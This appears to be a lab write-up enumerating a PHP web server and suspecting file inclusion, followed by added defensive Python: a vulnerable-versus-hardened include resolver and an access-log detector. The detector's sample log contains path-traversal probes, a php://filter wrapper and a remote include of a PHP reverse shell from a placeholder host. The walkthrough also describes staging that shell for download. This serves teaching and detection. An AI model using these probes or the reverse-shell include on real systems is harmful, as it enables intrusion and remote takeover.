e335462da856f39997bffdc04b8d89ce1104fcc5
2b0286a69b276189afe50517304963e5fa5982d9
rustscan -a 10.150.150.18
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
nmap -sC -sV 10.150.150.18 -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 2f:0e:73:d4:ae:73:14:7e:c5:1c:15:84:ef:45:a4:d1 (RSA)
| 256 39:0b:0b:c9:86:c9:8e:b5:2b:0c:39:c7:63:ec:e2:10 (ECDSA)
|_ 256 f6:bf:c5:03:5b:df:e5:e1:f4:da:ac:1e:b2:07:88:2f (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Welcome to my homepage!
|_Requested resource was /index.php?page=home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir -u 10.150.150.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -q
/includes (Status: 301) [Size: 317] [--> http://10.150.150.18/includes/]
Navigate to http://10.150.150.18/includes/
Since a request to 10.150.150.18 is automatically redirected to /index.php?page=home, it is worth fuzzing the value of the page parameter with dirb.
dirb http://10.150.150.18/index.php?page=
---- Scanning URL: http://10.150.150.18/index.php?page= ----
+ http://10.150.150.18/index.php?page=about (CODE:200|SIZE:1955)
+ http://10.150.150.18/index.php?page=about_us (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=aboutus (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=about-us (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=cgi-home (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contact (CODE:200|SIZE:1900)
+ http://10.150.150.18/index.php?page=contact_bean (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contact_us (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contact-form (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contactinfo (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contacto (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contacts (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contactus (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=contact-us (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=home (CODE:200|SIZE:1905)
+ http://10.150.150.18/index.php?page=homepage (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=homes (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=homework (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=index (CODE:200|SIZE:11110836)
+ http://10.150.150.18/index.php?page=myhomework (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=nethome (CODE:200|SIZE:959)
+ http://10.150.150.18/index.php?page=sucontact (CODE:200|SIZE:959)
One result stands out: /index.php?page=index returns an oversized response of 11110836 bytes, while every other unknown page returns the same 959-byte error page.
+ http://10.150.150.18/index.php?page=index (CODE:200|SIZE:11110836)
https://owasp.org/www-community/attacks/Path_Traversal
Since the site runs PHP and the page=index request returns an enormous response, we suspect the page parameter is passed straight to a PHP include and is pulling in far more than the intended page. That makes the site a candidate for LFI, RFI or path traversal, so we test for it.
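To make the weakness the write-up is probing concrete, here is an added example (not code from the write-up or from the target application) that models in Python how a ?page= parameter can be resolved to an include target. The first resolver concatenates the parameter the way a vulnerable index.php typically does (which also explains why page=index can balloon: index.php ends up including itself); the second applies an allow-list plus real-path containment. The allow-listed page names and the pages/ layout are assumptions, and everything runs inside a temporary directory.

```python
"""Model of a PHP-style ?page= include resolver, vulnerable and hardened.

Added example, not code from the write-up. The pages/ layout and the set of
allowed page names are assumptions; all files are created in a temp dir."""
import os
import tempfile
from urllib.parse import unquote

# Assumption: the pages the site means to serve. The scan above only shows
# that home, about and contact return distinct content.
ALLOWED_PAGES = {"home", "about", "contact"}


def make_web_root() -> str:
    """Build a throwaway document root with a pages/ directory."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    os.makedirs(os.path.join(root, "pages"))
    for name in ALLOWED_PAGES:
        with open(os.path.join(root, "pages", name + ".php"), "w") as fh:
            fh.write(f"<?php echo '{name}'; ?>\n")
    return root


def resolve_unchecked(web_root: str, page: str) -> str:
    """Vulnerable pattern, the equivalent of include('pages/' . $_GET['page'] . '.php').

    The (web-server-decoded) parameter is concatenated as-is, so '../'
    sequences walk out of pages/ and page=index resolves to index.php itself."""
    return os.path.normpath(os.path.join(web_root, "pages", unquote(page) + ".php"))


def resolve_hardened(web_root: str, page: str):
    """Defensive pattern: decode once, accept only allow-listed names, then
    confirm the resolved real path still lies under pages/.

    Returns None on rejection so the caller can answer 404 instead of including."""
    name = unquote(page)
    if name not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(os.path.join(web_root, "pages"))
    target = os.path.realpath(os.path.join(base, name + ".php"))
    # commonpath (not startswith) so a sibling like pages_evil/ cannot match
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def stays_inside(web_root: str, resolved: str) -> bool:
    """True if an include path resolved by either function is under pages/."""
    base = os.path.realpath(os.path.join(web_root, "pages"))
    return os.path.commonpath([base, os.path.realpath(resolved)]) == base


if __name__ == "__main__":
    root = make_web_root()
    for param in ["home", "../index", "../../../../etc/passwd", "home%2F..%2F..%2Findex"]:
        unchecked = resolve_unchecked(root, param)
        print(f"{param!r:32} unchecked -> {unchecked} (inside pages/: {stays_inside(root, unchecked)})")
        print(f"{'':32} hardened  -> {resolve_hardened(root, param)}")
```

The allow-list is the real fix; the realpath containment check is defence in depth for the day someone adds a page name that contains a separator. Note that blocklisting "../" alone would not help against a parameter that names a stream wrapper or a remote URL, which is why the hardened resolver never lets the raw value reach the filesystem at all.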
First we fetch php-reverse-shell.php from https://github.com/tutorial0/WebShell/blob/master/Php/php-reverse-shell.php
Then we start a Python HTTP server on port 8000
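From the defender's side, every step of this walkthrough leaves a distinctive line in the Apache access log. The following is an added example (not code from the write-up) of detection logic run over constructed combined-format log lines: it flags page= values that carry traversal sequences, PHP stream wrappers or a remote URL of the kind a reverse-shell include would use, and separately flags responses far larger than the per-path baseline, which is the symptom that gave page=index away above. The log lines, the 192.0.2.x addresses (a documentation range used as a placeholder for the probing host) and the 20x size threshold are all constructed for the example.

```python
"""Access-log detector for ?page= include probes and oversized responses.

Added example, not code from the write-up. SAMPLE_LOG is constructed;
192.0.2.0/24 is a documentation range standing in for the probing host."""
import re
from statistics import median
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
192.0.2.10 - - [10/Mar/2021:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1905 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2021:10:01:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 1955 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2021:10:01:09 +0000] "GET /index.php?page=index HTTP/1.1" 200 11110836 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2021:10:02:31 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 959 "-" "curl/7.68.0"
192.0.2.10 - - [10/Mar/2021:10:02:40 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 959 "-" "curl/7.68.0"
192.0.2.10 - - [10/Mar/2021:10:03:12 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 2800 "-" "curl/7.68.0"
192.0.2.10 - - [10/Mar/2021:10:04:55 +0000] "GET /index.php?page=http://192.0.2.10:8000/php-reverse-shell.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
"""

# Apache combined log format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules are applied to the decoded page= value. Order matters only for readability.
RULES = [
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),           # ../ or ..\ segments
    ("php_wrapper", re.compile(r"^(php|data|expect|phar|zip|glob|file)\s*:", re.I)),
    ("remote_include", re.compile(r"^(https?|ftps?)://", re.I)),    # RFI via allow_url_include
]


def parse_line(line: str):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["params"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def page_rules(params: dict) -> list:
    """Names of the rules matched by any page= value (decoded twice to catch
    double-encoded probes such as %252e%252e)."""
    reasons = []
    for raw in params.get("page", []):
        value = unquote(raw)
        for name, rx in RULES:
            if rx.search(value) and name not in reasons:
                reasons.append(name)
    return reasons


def analyse(log_text: str, size_factor: int = 20) -> list:
    """Return one finding per suspicious request.

    A request is suspicious if its page= value matches a rule, or if its
    response size exceeds size_factor times the median size for that path."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    sizes_by_path = {}
    for e in entries:
        sizes_by_path.setdefault(e["path"], []).append(e["size"])
    baseline = {path: median(sizes) for path, sizes in sizes_by_path.items()}

    findings = []
    for e in entries:
        reasons = page_rules(e["params"])
        if e["size"] > size_factor * max(baseline[e["path"]], 1):
            reasons.append("oversized_response")
        if reasons:
            findings.append({"ip": e["ip"], "ts": e["ts"], "target": e["target"],
                             "size": e["size"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']}  {f['size']:>9}  {','.join(f['reasons']):28}  {f['target']}")
```

The size baseline is deliberately per path and median-based so a single huge response (the recursive include) cannot drag the baseline up with it. In production the same rules map cleanly onto a web application firewall or a SIEM query, and the remote_include hit is the one worth paging on: it means the server was asked to fetch and execute code from an outside host.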